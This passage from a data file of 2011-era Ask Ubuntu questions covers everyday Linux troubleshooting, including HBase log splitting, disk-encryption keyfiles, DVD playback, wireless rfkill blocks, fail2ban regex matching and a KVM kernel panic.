exiting wait on regionserver ( s ) to checkin ; count=1 , stopped=false , count of regions out on cluster=0 2011-05-17 18:30:29,942 info org.apache.hadoop.hbase.master.masterfilesystem : log folder file : /tmp/hbase-sbos/hbase/.logs/localhost,57656,1305642624559 belongs to an existing region server 2011-05-17 18:30:29,942 info org.apache.hadoop.hbase.master.masterfilesystem : log folder file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674 does n't belong to a known region server , splitting 2011-05-17 18:30:29,948 info org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : splitting 1 hlog ( s ) in file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674 2011-05-17 18:30:29,949 debug org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : writer thread thread [ writerthread-0,5 , main ] : starting 2011-05-17 18:30:29,952 debug org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : splitting hlog 1 of 1 : file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674/localhost % 3a57701.1305642583180 , length=0 2011-05-17 18:30:29,952 warn org.apache.hadoop.hbase.util.fsutils : running on hdfs without append enabled may result in data loss 2011-05-17 18:30:29,952 warn org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : file file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674/localhost % 3a57701.1305642583180 might be still open , length is 0 2011-05-17 18:30:29,956 warn org.apache.hadoop.fs.fsinputchecker : problem opening checksum file : file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674/localhost % 3a57701.1305642583180 . ignoring exception : java.io.eofexception at java.io.datainputstream.readfully ( datainputstream.java:180 ) at java.io.datainputstream.readfully ( datainputstream.java:152 ) at org.apache.hadoop.fs.checksumfilesystem $ checksumfsinputchecker. < init > ( checksumfilesystem.java:134 ) at org.apache.hadoop.fs.checksumfilesystem.open ( checksumfilesystem.java:283 ) at org.apache.hadoop.io.sequencefile $ reader.openfile ( sequencefile.java:1444 ) at org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader $ walreader.openfile ( sequencefilelogreader.java:65 ) at org.apache.hadoop.io.sequencefile $ reader. < init > ( sequencefile.java:1431 ) at org.apache.hadoop.io.sequencefile $ reader. < init > ( sequencefile.java:1424 ) at org.apache.hadoop.io.sequencefile $ reader. < init > ( sequencefile.java:1419 ) at org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader $ walreader. < init > ( sequencefilelogreader.java:57 ) at org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader.init ( sequencefilelogreader.java:158 ) at org.apache.hadoop.hbase.regionserver.wal.hlog.getreader ( hlog.java:576 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.getreader ( hlogsplitter.java:477 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.parsehlog ( hlogsplitter.java:414 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.splitlog ( hlogsplitter.java:262 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.splitlog ( hlogsplitter.java:188 ) at org.apache.hadoop.hbase.master.masterfilesystem.splitlog ( masterfilesystem.java:197 ) at org.apache.hadoop.hbase.master.masterfilesystem.splitlogafterstartup ( masterfilesystem.java:181 ) at org.apache.hadoop.hbase.master.hmaster.finishinitialization ( hmaster.java:385 ) at org.apache.hadoop.hbase.master.hmaster.run ( hmaster.java:283 ) at org.apache.hadoop.hbase.master.hmastercommandline $ localhmaster.run ( hmastercommandline.java:193 ) at java.lang.thread.run ( thread.java:662 ) 2011-05-17 18:30:29,957 warn org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader : error while trying to get accurate file length . truncation / data loss may occur if regionservers die . java.lang.nosuchmethodexception : org.apache.hadoop.fs.checksumfilesystem $ checksumfsinputchecker.getfilelength ( ) at java.lang.class.getmethod ( class.java:1605 ) at org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader $ walreader $ walreaderfsdatainputstream.getpos ( sequencefilelogreader.java:107 ) at org.apache.hadoop.io.sequencefile $ reader. < init > ( sequencefile.java:1434 ) at org.apache.hadoop.io.sequencefile $ reader. < init > ( sequencefile.java:1424 ) at org.apache.hadoop.io.sequencefile $ reader. < init > ( sequencefile.java:1419 ) at org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader $ walreader. < init > ( sequencefilelogreader.java:57 ) at org.apache.hadoop.hbase.regionserver.wal.sequencefilelogreader.init ( sequencefilelogreader.java:158 ) at org.apache.hadoop.hbase.regionserver.wal.hlog.getreader ( hlog.java:576 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.getreader ( hlogsplitter.java:477 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.parsehlog ( hlogsplitter.java:414 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.splitlog ( hlogsplitter.java:262 ) at org.apache.hadoop.hbase.regionserver.wal.hlogsplitter.splitlog ( hlogsplitter.java:188 ) at org.apache.hadoop.hbase.master.masterfilesystem.splitlog ( masterfilesystem.java:197 ) at org.apache.hadoop.hbase.master.masterfilesystem.splitlogafterstartup ( masterfilesystem.java:181 ) at org.apache.hadoop.hbase.master.hmaster.finishinitialization ( hmaster.java:385 ) at org.apache.hadoop.hbase.master.hmaster.run ( hmaster.java:283 ) at org.apache.hadoop.hbase.master.hmastercommandline $ localhmaster.run ( hmastercommandline.java:193 ) at java.lang.thread.run ( thread.java:662 ) 2011-05-17 18:30:29,959 warn org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : could not open file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674/localhost % 3a57701.1305642583180 for reading . file is emptyjava.io.eofexception 2011-05-17 18:30:29,959 debug org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : writer thread thread [ writerthread-1,5 , main ] : starting 2011-05-17 18:30:29,959 debug org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : writer thread thread [ writerthread-2,5 , main ] : starting 2011-05-17 18:30:29,962 info org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : archived processed log file : /tmp/hbase-sbos/hbase/.logs/localhost,57701,1305642579674/localhost % 3a57701.1305642583180 to file : /tmp/hbase-sbos/hbase/.oldlogs/localhost % 3a57701.1305642583180 2011-05-17 18:30:29,964 info org.apache.hadoop.hbase.regionserver.wal.hlogsplitter : waiting for split writer threads to finish full logs are here : http : //pastebin.com/1a2ymkqz so , how make it works ?
43422	8 gb ram on 64 bit processor using 32 bit ubuntu	i 'm going to repeat the title in a longer word . can a 32 bit ubuntu address more than 4 gb of ram on a 64 bit processor ?
43429	how do i install packages selectively from repositories ?	in my case i 've got lucid installed on my server but want to install a newer saned version . there is one in the maverick and lucid repositories , how would i add this repository for just that one package ? what should i look for when doing this ?
43430	how to open mac documents .page , on libreoffice	i need to open text documents . `` page '' and keynote presentations also keep in osx , how do i open or install this extension in libreoffice ?
43432	stop crypttab asking for password for swap	i instaled a fresh 11.04 system when it was released and set up full disk encryption with luks . at first it asked me for a password for my three encrypted partitions : / /home swap typing in the passphrase three times got frustrating , so i tried to set up /home and swap to decrypt from a keyfile stored on / . i created the keyfile and enabled it on the two partitions . my crypttab now looks like this : root-root_crypt uuid=13c21bf6-4d92-42a7-877a-87cc31b1aa19 none luks home-home_crypt uuid=ba90ce5b-9df7-4764-8a72-011bbb164db4 /root/keyfile luks home-home_crypt uuid=ba90ce5b-9df7-4764-8a72-011bbb164db4 none luks sda3_crypt uuid=e4677895-2114-4054-9f23-d36f6bb0e6a2 /root/keyfile luks , swap this works fine for /home , which gets mounted automatically without asking for a password . but cryptsetup still asks for a password for the swap space . i 've even tried adding noauto to the swap space so it would n't be set up at all -- once the system is booted i can enable it without the passphrase , so i thought i 'd just add a late init script to do it , but even with noauto cryptsetup still asks for the passphrase . thanks !
43433	will files and data be deleted when i update from 10.10 to 11.04 ?	i am thinking to update from 10.10 to 11.04 . will any files or data be deleted ? thanks in advance .
43438	installing ubuntu over ubuntu netbook ?	my brother a couple months ago bought a netbook and installed ubuntu netbook on it . he later realized that he did not really use the asus eee netbook and wanted to sell it . he said i could have it for 100 dollars . the problem is he said that ubuntu netbook is very limiting . is it ? i did not like the simplified interface , so i decided i was going to install a full desktop version of ubuntu on it . i downloaded the zip file and put it on my flash driver after unzipping it . i then set the boot order to be from the flash drive and then i booted the machine . the screen was black and then some text appear . it flashed to quickly for me to read all of it , or any of it . was my download and unzip corrupt ? can you not install ubuntu desktop over ubuntu netbook ? if you can how would you ? i am very new to linux but i want to learn it for a class and my own personal reasons . thank you ps : because the text flashed by so fast i was unable to know what to google to help . for my class and my college projects i am working with blender and java
43445	how to play dvds after installing the recommended libraries ?	there are couple of similar topics here and here , but the gist of the answers is to do what 's stated in the documentation . these are the commands i 've already run sudo apt-get install ubuntu-restricted-extras sudo apt-get install libdvdread4 sudo /usr/share/doc/libdvdread4/install-css.sh sudo apt-get install libdvdcss2 sudo apt-get install w64codecs sudo apt-get install gstreamer0.10-plugins-bad sudo apt-get install gstreamer0.10-plugins-ugly and probably some other codecs and whatnot that i ca n't remember at the moment . i 've tried three different dvds on both vlc and movieplayer . vlc gives the error `` vlc can not set the dvd 's title . it possible can not decrypt the entire disc '' and then plays the fbi warning before exiting with more errors like that . movieplayer just plays the warning and exits without error ( kind of annoying ) . i 'm running ubuntu 64-bit desktop 11.04 . what else can i try to fix this ? i 'm having trouble troubleshooting this issue because it seems that every website just says to do the above .
43451	how do i start kde after x crash ?	x just crashed on my ubuntu 10.04 computer . gnome is working , but i would like to use kde instead . running startx just starts gnome , loging out through gnome brings me back to the shell . i tried sudo kdm but it does n't do anything .
43455	is there a unity alternative ?	i 've been using natty since it came out now . i 'm a developer and unity does n't fit my workflow . i figured out how to disable unity ( from the login screen ) a week ago , but everything seems to be working only halfway on my desktop now , the notification area does n't work correctly anymore , my sound-control has gone , i do n't have control over the horrible shadows around the windows with ambiance or radiance on , under other things . i 'm considering to downgrade to 10.10 lts - but first i wanted to ask here if there 's some kind of alternative ( maybe not official ) build of ubuntu natty - with the old desktop configuration .
43457	how to operate korean ime ?	i 'm used to the windows korean ime ... the ubuntu korean ime seems to randomly switch to korean mode , and i have no idea how to switch back~ please explain : how to completely uninstall/disable korean input how to identify which ime i 'm using ; i know there are various linux ime 's . i knew about nabi , and tried installing that one , but it seemed like part of the install failed . ibus seems to come pre-installed on ubuntu . originally , ibus only offered chinese ime , but korean appeared after the failed nabi installation . how to tell which input mode the ime is currently in ( korean hangul or english 'roman ' ) . : ibus adds a tiny keyboard icon to the top panel , but it does n't seem to display the current input mode anywhere . ( compare to windows microsoft ime , which displays an icon depending on the input mode ( the letter 'a ' , or the korean equivalent 'ě ' ) . how to switch between korean hangul mode and english 'roman ' mode : the ime seems to randomly switch to korean mode when i type rapidly , but i 'm sure i am triggering something . the questions above are most critical , but while i 'm at it ... how to convert korean characters to their chinese equivalents ( the hanja key ) .
43458	how can i take a screenshot of the login screen ?	how can i take a screenshot of the login screen ? i do not want to recreate my ubuntu installation in a virtual machine .
43465	how to automatically connect to vpn with network-manager	i do have a working vpn connection . now i want this vpn connection to automatically activate when i 'm in a certain wireless network . is there a non-intrusive graphical way using network-manager-applet ? if i remember correctly it worked for a while and does n't anymore . i made the wireless-connection in question available for all users for not having to input the password every time . the cli program used is vpnc with hybrid-auth enabled ( cisco vpn-client compatible ) from sroecker 's ppa edit : i can ' try the answers anymore ( because of eduroam ) and since no answer seems to gain a majority of votes i 'm just gon na leave it unanswered for now until one is upvoted then i 'm gon na accept that .
43467	is there any way to launch tomboy without showing up the main window ?	i saw that there 's a applet for tomboy , but if i run the standalone program ( tomboy ) it shows up in the indicators panel ( which , to me , is more preferable than having a specific applet for tomboy ) . my question is : is there any way to launch tomboy without showing up the main window ? in empathy , for example , i can do this by specifing the -h option in command-line .
43469	how can i graphically mount isos ?	i want a graphical ( gui ) method to mount an iso , is there any way to do so ?
43470	holding click on window titlebar while changing workspaces in 11.04	in previous versions of ubuntu , i could click and hold on a window 's titlebar and then use my hot key combination to switch to a different workspace and the window would come with me . however , in 11.04 , if i try this , the keyboard switching hot key appears to be disabled once i have clicked on the titlebar . i understand that i can use keyboard shortcuts or right click the titlebar , to move a window to a specific workspace . however , i prefer the other behavior and am curious if there is anyway to get it to work .
43471	is there a way to shutdown the x display ?	i know about startx , but is there a command that stops x ? i run ubuntu 10.04 .
43479	what 's the best chess program for a beginner ?	pychess would n't work for me and after trying other software i settled for eboard . i can play a basic game with it but the interface is intimidating and there appears to be no documentation . is there a tutorial somewhere or should i try some different software ?
43480	how do i play quake live ?	i have been trying to get natty to play quake live with no luck . some notes installing in chrome does n't work at all -- it seems to download the xpi ( firefox plugin file ) installing in firefox ( latest -- at the moment this is 4.0.1 ) does n't work due to incompatibility with v4.0.1 . installing in older firefox ( v3.6.17 ) works , but i am still unable to play . whenever quakelive.com is loaded , the browser is redirected to the install page ( even when i have the plugin installed ) . this is the closest i have come to actually getting it working . although , i 'm not sure if this is a dead end . many of the people on the quake live forums seem to use this solution . any help is appreciated . thanks .
43482	what are common causes for greatly decreased internet speeds ?	two days ago i set my computer up to dual-boot with windows 7 and ubuntu 11.04 . on windows 7 , my download speed averages around 500kb/s , regardless of time of day . on ubuntu , downloading simple updates from the software centre , my average speed is about 15-20kb/s rather than 500-540kb/s which i get on windows 7 . i am on a wireless network . any input would be greatly appreciated . also , my father is on ubuntu 11.04 as well , and his connection speed is no slower than it was before . could that be because he 's wired in to the modem itself rather than running wireless ? i 'm unsure of what to do to bring ubuntu 's speed on my laptop back up from the stone age to where it should be .
43484	fail2ban misses some relay attempts	i have some relay attempts like these in my mail.log ( they total 281 connection attempts in less than 3 minutes ) : may 16 04:58:30 myserver postfix/smtpd [ 18950 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:30 myserver postfix/smtpd [ 18951 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:30 myserver postfix/smtpd [ 18951 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:31 myserver postfix/smtpd [ 18947 ] : warning : unknown [ xx.yy.zzz.www ] : sasl login authentication failed : authentication failure may 16 04:58:31 myserver postfix/smtpd [ 18952 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:31 myserver postfix/smtpd [ 18952 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:31 myserver postfix/smtpd [ 18947 ] : disconnect from unknown [ xx.yy.zzz.www ] may 16 04:58:32 myserver postfix/smtpd [ 18922 ] : warning : unknown [ xx.yy.zzz.www ] : sasl login authentication failed : authentication failure may 16 04:58:32 myserver postfix/smtpd [ 18947 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:32 myserver postfix/smtpd [ 18947 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:33 myserver postfix/smtpd [ 18953 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:33 myserver postfix/smtpd [ 18953 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:33 myserver postfix/smtpd [ 18922 ] : disconnect from unknown [ xx.yy.zzz.www ] may 16 04:58:33 myserver postfix/smtpd [ 18948 ] : warning : unknown [ xx.yy.zzz.www ] : sasl login authentication failed : authentication failure may 16 04:58:33 myserver postfix/smtpd [ 18949 ] : warning : unknown [ xx.yy.zzz.www ] : sasl login authentication failed : authentication failure may 16 04:58:33 myserver postfix/smtpd [ 18922 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:33 myserver postfix/smtpd [ 18922 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:34 myserver postfix/smtpd [ 18948 ] : disconnect from unknown [ xx.yy.zzz.www ] may 16 04:58:34 myserver postfix/smtpd [ 18949 ] : disconnect from unknown [ xx.yy.zzz.www ] may 16 04:58:34 myserver postfix/smtpd [ 18948 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:34 myserver postfix/smtpd [ 18948 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:34 myserver postfix/smtpd [ 18949 ] : warning : xx.yy.zzz.www : hostname xx-yy-zzz-www.network.domain verification failed : no address associated with hostname may 16 04:58:34 myserver postfix/smtpd [ 18949 ] : connect from unknown [ xx.yy.zzz.www ] may 16 04:58:35 myserver postfix/smtpd [ 18950 ] : warning : unknown [ xx.yy.zzz.www ] : sasl login authentication failed : authentication failure may 16 04:58:35 myserver postfix/smtpd [ 18951 ] : warning : unknown [ xx.yy.zzz.www ] : sasl login authentication failed : authentication failure may 16 04:58:35 myserver postfix/smtpd [ 18950 ] : disconnect from unknown [ xx.yy.zzz.www ] i guess filter sasl ( which is enabled ) should take care of them , but ip is never banned . seems there 's no match with the failregex expression in sasl.conf filter : # fail2ban configuration file # # author : yaroslav halchenko # # $ revision : 728 $ # [ definition ] # option : failregex # notes . : regex to match the password failures messages in the logfile . the # host must be matched by a group named `` host '' . the tag `` < host > '' can # be used for standard ip/hostname matching and is only an alias for # ( ? : : : f { 4,6 } : ) ? ( ? p < host > [ \w\-.^_ ] + ) # values : text # failregex = ( ? i ) : warning : [ -._\w ] +\ [ < host > \ ] : sasl ( ? : login|plain| ( ? : cram|digest ) -md5 ) authentication failed ( : [ a-za-z0-9+/ ] *= { 0,2 } ) ? $ # option : ignoreregex # notes . : regex to ignore . if this regex matches , the line is ignored . # values : text # ignoreregex = any hint on what 's failing here ? any way to correct the problem ? edit : a simpler question that could be a start for troubleshooting this issue : do those sasl login warnings in mail.log match the failregex expression ? i do n't really know how to test it , and i do n't have enough knowledge about regex sintax to work it out on my own . thanks in advance .
43485	how to show current permissions of a folder	i want to find out who has what permissions on a certain folder . how would i go about viewing this ? the folder in question is /srv/www
43487	how to file a bug on gnome 's bugzilla ?	i want to file a bug directly upstream to gnome . can someone give exact procedure for filing bugs on gnome bugzilla ?
43492	terminal shortcut key not respecting keyboard layout	i just installed 11.04 and am using the dvorak keyboard layout . when i press ctrl + alt + t to bring up the terminal it does n't bring it up , but when i press ctrl + alt + y ( the key that would be t in qwerty ) it brings up a terminal . i have no other keyboard layouts installed , but have switched caps lock and control . in the keyboard shortcuts configuration it shows up as ctrl + alt + t to launch a terminal . i would like the terminal shortcut to respect the keyboard layout .
43494	where can i buy a lenovo x220 with ubuntu preinstalled ?	this link here : http : //www.ubuntu.com/certification/make/lenovo states `` pre-installed only '' for the x220 leading me to believe i can buy this model with ubuntu preinstalled . i 've been unable to find such an option at lenovo 's website .
43500	where 's the `` log out '' option after clicking the power icon ?	so the documentation says : to log out or switch users , click the power icon on the top bar and select the appropriate option . however , i can not see the `` log out '' option . all i see are : lock screen switch from ubuntu suspend restart ... shut down system settings i managed to log out via a terminal command . any way to log out via the unity gui or add this option to the power icon menu ? update : i 'm running from a live usb .
43502	black screen except for mouse cursor on thinkpad edge 15	after not using the computer for a few hours , i return and see a black/blank screen . i see the mouse cursor . it responds to movements and it changes state as if the windows are there ( changing to text or 'link thumb ' ) . but all i see is a black screen . anyone knows anything about this ?
43505	wine programs ( steam and football manager ) do n't work after upgrade	since upgrading to natty some programs using wine do n't work . steam football manager 2011 i 've tried reinstalling and they both crash . i have tried wine 1.3 and it still does n't work . i get the error : http : //paste.ubuntu.com/610185/ this is using wine version 1.2 .
43507	how to find the command of an installed application ?	i have an installed application , but i do n't know its name . ( by `` name '' i mean what i would type in a command line . ) is there any way to see this ? it seems so obvious , but i ca n't figure it out .
43513	is it possible to change the size of icons in the indicator applet ?	the width of the icons in the gnome panel indicator applet is taking up too much space . is it possible to specify the width of the icons in some configuration file so that the icons do not take extra space ?
43516	how to replace python-gtkhtml2 ?	i would like to install under lucid the restructured text plugin for gedit , but it fails as it ca n't import gtkhtml2 . previously it was provided by the python-gtkhtml2 package , but it 's not compatible with python2.6 . is there any recent package that is backwards compatible with gtkhtml2 and could be easily put in place of the old import line ? or any other solution you know ?
43517	how do i install xulrunner since it 's a requeriment for pencil ?	i 'm installing pencil and get the following error : xulrunner : not found . xulrunner is a a requirement for pencil . so how do i install xulrunner and it 's dependencies ?
43520	ubuntu one restarts sync every 5 min	i 've looked around the site , there seems to be a lot of people who are having issues with ubuntu one syncing . my problem is a bit different , as the sync keeps on restarting on my computer every 5 min , and every time time i get this message : 'refdenver.pdf ' is being uploaded to your cloud . the file is small , and i 've been waiting fro an hours now already and it keeps repeating the message . what could be the problem of that ? thanks in advance , danny
43525	copying files to sd card not saving	i am copying 486 items , totalling 2.9 gb , from a folder on my desktop , to a microsd 16 gb card via a usb card reader . the tranfer completes fine . i then do a safely remove ( have also tried eject and unmount ) , but never do all the files copy , even though the transfer completes without error . when i plug the card back in and view the contents , the main directory structure is there , but the folders inside are empty ( no files ) . why ? i have tried different microsd cards . its like ubuntu is copying the files into my ram instead ( i 'm guessing ) , or some other cache , and even though i do a safe removal , the files i 've copied are not all there . the majority of files in sub-folders are missing . running ubuntu 11.04 updated .
43529	my lenovo ideapad u165 wireless does n't work	it really makes me angry ! my wireless hardware is broadcom 4313 . ubuntu install it automatically but i ca n't use it . it says your hardware switch is off although it is on . after i use `` rfkill unblock all `` for several times it says your device is n't ready ! ! this is my rfkill list : 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no 2 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 3 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes after i unblock all : 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no 2 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 3 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 4 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no plz help me ! i use windows only for wireless ! ! ! !
43541	is alt+tab made obsolete by super+w in unity ?	i have long relied on alt+tab to cycle through applications . since upgrading to unity in ubuntu 11.04 , i found that alt+tab has been very slow . today , i found that super+w , followed by arrow keys and enter replaces this functionality and is more responsive . has super+w made alt+tab` obsolete ?
43545	why is n't my audio working ?	why is n't my audio working in 11.04 ? if anyone knows , how can i fix it ?
43546	hp deskjet 1000 j110 printer wo n't print	i installed the ppa : hplip-isv/ppa for a hp deskjet 1000 j110 printer . hp print drivers installed but ... printer still wo n't print . why ?
43549	can i run ubuntu in javascript ( linux emulator ) ?	is it possible to run ubuntu in jslinux ? here is today 's slashdot post about jslinux .
43551	gnome do banshee plugin ?	i have uninstalled rhythmbox and installed banshee . in gnome-do there was this nice feature of browsing your music files with the rhythmbox-plugin . so , on the gnome-do plugin wiki i could see that a banshee-plugin exists . on launchpad , specifically on this site i downloaded a tar.gz , where i could also see a banshee-plugin after unpacking . when i downloaded gnome-do-plugins via software centre there was no banshee-plugin to activate in gnome-do 's preferences . so , is there any way i could install this plugin from that tar.gz or any other way to install it ?
43552	why do the installed and most recent version numbers of gwibber differ ?	my apologies if this has been asked before , but i noticed that on gwibber 's website , they list 2.30 as the most recent version of gwibber . yet when i open gwibber in natty , it lists the version installed as 3.0.0.1 is this an ubuntu specific version or is the site out of date ?
43555	how to configure automatic reboot after kernel panic ?	now , it 's the first time i encountered a kernel panic on a system that i can only access remotely ( i.e . not physical access ) . the kernel panic i encountered is basically the one described here , only that the kernel version was : pid : 15483 , comm : kvm not tainted 2.6.32-30-server # 59-ubuntu ms-7522 the system is an ubuntu 10.04 and i 've been using ksplice in order to keep it secure without reboots . the whole panic obviously resulted effectively in an unresponsive system . since it runs vms , this is not acceptable . now , my question is this : is there a way to configure the system ( e.g . via sysctl.conf ) to reboot automatically when it encounters a kernel panic ? if there is such an option , but it is not recommended to use it , please provide pointers or information as to why it is not recommended so i can male a well-informed decision whether to use it or refrain from using it . for your reference , below the excerpt from syslog : bug : unable to handle kernel null pointer dereference at ( null ) ip : [ < ffffffffa0339e6a > ] gfn_to_rmap+0x2a/0x80 [ kvm ] pgd 182eff067 pud 2103cd067 pmd 0 oops : 0000 [ # 1 ] smp last sysfs file : /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq cpu 2 modules linked in : btrfs zlib_deflate crc32c libcrc32c ufs qnx4 hfsplus hfs minix ntfs vfat msdos fat jfs xfs exportfs reiserfs ksplice_a2zjpxfc ksplice_aeduoyr1 ksplice_ocpqubki ksplice_koav9q4r_vmlinux_new ksplice_koav9q4r ksplice_6rzac0n3_vmlinux_new ksplice_6rzac0n3 ksplice_sqv65gpe ksplice_74bgebjk ksplice_l13a9izo_vmlinux_new ksplice_l13a9izo ksplice_51l2thd5_vmlinux_new ksplice_51l2thd5 ksplice_mzqhwd6a ksplice_0k98nifa_vmlinux_new ksplice_0k98nifa ksplice_c0g8d8te_vmlinux_new ksplice_c0g8d8te ksplice_6jvv7tl8_vmlinux_new ksplice_6jvv7tl8 ksplice_o2xegqal ksplice_r7xdx1no ksplice_ly8vh9y3_vmlinux_new ksplice_ly8vh9y3 nls_cp437 ip6table_filter ip6_tables kvm_intel kvm bridge stp nls_utf8 cifs ipt_log ipt_masquerade ipt_reject xt_recent xt_state xt_tcpudp iptable_filter iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 xt_multiport ip_tables x_tables fbcon tileblit font bitblit softcursor snd_hda_intel vga16fb vgastate snd_hda_codec snd_hwdep nouveau snd_pcm ttm snd_timer snd drm_kms_helper soundcore snd_page_alloc drm lp i2c_algo_bit parport multipath linear aacraid 3w_9xxx 3w_xxxx raid10 raid456 async_pq async_xor xor async_memcpy async_raid6_recov raid6_pq async_tx raid1 raid0 ahci r8169 mii sata_nv sata_sil sata_via [ last unloaded : ksplice_a2zjpxfc_ocfs2_new ] pid : 15483 , comm : kvm not tainted 2.6.32-30-server # 59-ubuntu ms-7522 rip : 0010 : [ < ffffffffa0339e6a > ] [ < ffffffffa0339e6a > ] gfn_to_rmap+0x2a/0x80 [ kvm ] rsp : 0018 : ffff88014ee4d828 eflags : 00010246 rax : 0000000000000000 rbx : 400000000001ec15 rcx : ffff8801d5e28990 rdx : 0000000000000023 rsi : 0000000000000000 rdi : 0000000000000000 rbp : ffff88014ee4d838 r08 : 0000000000000023 r09 : 0000000000000100 r10 : 0000000000000000 r11 : 0000000000000007 r12 : 0000000000000001 r13 : 00000000000ba08a r14 : ffff880032c0dbb0 r15 : ffff88014ee4d928 fs : 00007f1b0d201700 ( 0000 ) gs : ffff880008e40000 ( 0000 ) knlgs:0000000000000000 cs : 0010 ds : 002b es : 002b cr0 : 0000000080050033 cr2 : 0000000000000000 cr3 : 0000000158378000 cr4 : 00000000000026f0 dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 process kvm ( pid : 15483 , threadinfo ffff88014ee4c000 , task ffff88000d274500 ) stack : ffff8800b418d0a8 ffff8801d5e28000 ffff88014ee4d868 ffffffffa0339f5f < 0 > ffff8801d5e28000 ffffc90016afa8a8 fff0000000000fff 000000018849a000 < 0 > ffff88014ee4d8b8 ffffffffa033a4cf 0000000000000001 ffff8800b418d0a8 call trace : [ < ffffffffa0339f5f > ] rmap_remove+0x9f/0x1c0 [ kvm ] [ < ffffffffa033a4cf > ] kvm_set_pte_rmapp+0xff/0x170 [ kvm ] [ < ffffffffa033653d > ] kvm_handle_hva+0x9d/0x120 [ kvm ] [ < ffffffffa033a3d0 > ] ? kvm_set_pte_rmapp+0x0/0x170 [ kvm ] [ < ffffffffa0336601 > ] kvm_set_spte_hva+0x21/0x30 [ kvm ] [ < ffffffff8155e2ce > ] ? _spin_lock+0xe/0x20 [ < ffffffffa0322aa4 > ] kvm_mmu_notifier_change_pte+0x44/0x60 [ kvm ] [ < ffffffff81130e3e > ] __mmu_notifier_change_pte+0x3e/0x90 [ < ffffffff811172a4 > ] do_wp_page+0x674/0x850 [ < ffffffff81095228 > ] ? tick_dev_program_event+0x68/0xd0 [ < ffffffff8108a059 > ] ? __hrtimer_start_range_ns+0x189/0x400 [ < ffffffff81117c2c > ] handle_mm_fault+0x2ec/0x3c0 [ < ffffffff81113846 > ] ? follow_page+0x2d6/0x350 [ < ffffffff81117e39 > ] __get_user_pages+0x139/0x480 [ < ffffffffa033de1e > ] ? t.1169+0x1fe/0x2e0 [ kvm ] [ < ffffffff81118219 > ] get_user_pages+0x49/0x50 [ < ffffffff81045b27 > ] get_user_pages_fast+0x157/0x1c0 [ < ffffffffa0323af1 > ] gfn_to_pfn+0x41/0x150 [ kvm ] [ < ffffffffa034026d > ] tdp_page_fault+0x9d/0x140 [ kvm ] [ < ffffffff81195177 > ] ? mb_cache_entry_insert+0xb7/0x1d0 [ < ffffffffa033cc2f > ] kvm_mmu_page_fault+0x1f/0xa0 [ kvm ] [ < ffffffffa037dbf8 > ] handle_ept_violation+0x68/0x130 [ kvm_intel ] [ < ffffffffa0380a8a > ] vmx_handle_exit+0xca/0x250 [ kvm_intel ] [ < ffffffffa032f997 > ] vcpu_enter_guest+0x227/0x4c0 [ kvm ] [ < ffffffffa032fcac > ] __vcpu_run+0x7c/0x350 [ kvm ] [ < ffffffffa033621d > ] kvm_arch_vcpu_ioctl_run+0x8d/0x1d0 [ kvm ] [ < ffffffffa03252e3 > ] kvm_vcpu_ioctl+0x473/0x5c0 [ kvm ] [ < ffffffff811567b2 > ] vfs_ioctl+0x22/0xa0 [ < ffffffff81084fa6 > ] ? common_timer_set+0x116/0x1a0 [ < ffffffff81156951 > ] 